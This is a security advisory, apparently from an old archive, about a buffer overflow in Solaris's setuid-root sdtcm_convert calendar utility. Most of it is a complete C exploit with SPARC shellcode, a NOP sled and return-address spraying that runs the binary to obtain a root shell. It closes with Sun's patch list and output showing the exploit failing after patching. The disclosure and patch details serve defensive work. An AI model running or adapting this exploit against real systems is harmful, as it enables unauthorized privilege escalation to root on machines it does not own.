COMMAND
sdtcm_convert
SYSTEMS AFFECTED
Solaris 2.4, 2.5, 2.5.1, 2.6 and 7(only x86 for last one)
PROBLEM
Following is based on Sun Microsystems Security Bulletin.
sdtcm_convert is a setuid-root calendar data conversion utility
which converts version 3 (OpenWindows) calendar data format to
version 4 (extensible calendar data format), and vice versa. A
buffer overflow has been discovered which may be exploited to gain
root access.
Exploit follows. The epxloit is said to work on both Solaris 2.6
and 7, but the author fails to provide offsets for Solaris 7.
You may wish to change the
#define ADJUST 2
value to 1 for Solaris.
/*============================================================================
sdtcm_convert Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% gcc ex_sdtcm_convert.c (This example program)
% a.out
If no response, hit ctrl+c
#
============================================================================*/
#define ADJUST 2
#define OFFSET1 4000
#define LENGTH1 260
#define OFFSET2 6000
#define LENGTH2 1000
#define OFFSET3 6000+16*30
#define NOP 0xa61cc013
char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
unsigned long ret_adr;
int i;
main()
{
static char x[11000];
memset(x,'a',10000);
ret_adr=get_sp()-6300;
for (i = 0; i < 5000 ; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
ret_adr=get_sp() - 10200;
if ((ret_adr & 0xff )==0) ret_adr+=4;
printf("%lx\n",ret_adr);
for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
for (i = OFFSET2+ADJUST; i < OFFSET2+LENGTH2 ; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++)x[OFFSET3+ADJUST+i]=exploit_code[i];
x[10000]=0;
execl("/usr/dt/bin/sdtcm_convert", "sdtcm_convert", "-d",x,"test",(char *) 0);
}
SOLUTION
Sun recommends that you install the respective patches immediately
on affected systems:
CDE Version Patch ID
___________ _________
1.3 107022-01
1.3_x86 107023-01
1.2 105566-06
1.2_x86 105567-07
1.0.2 103670-06
1.0.2_x86 103717-06
1.0.1 103671-06
1.0.1_x86 103718-06
With the patch installed the exploit fails thus:
s4u-26% ./sdtcm_convert_exploit
efffd0c0
Problem accessing calendar file /usr/spool/calendar/callog.test:
No such file or directory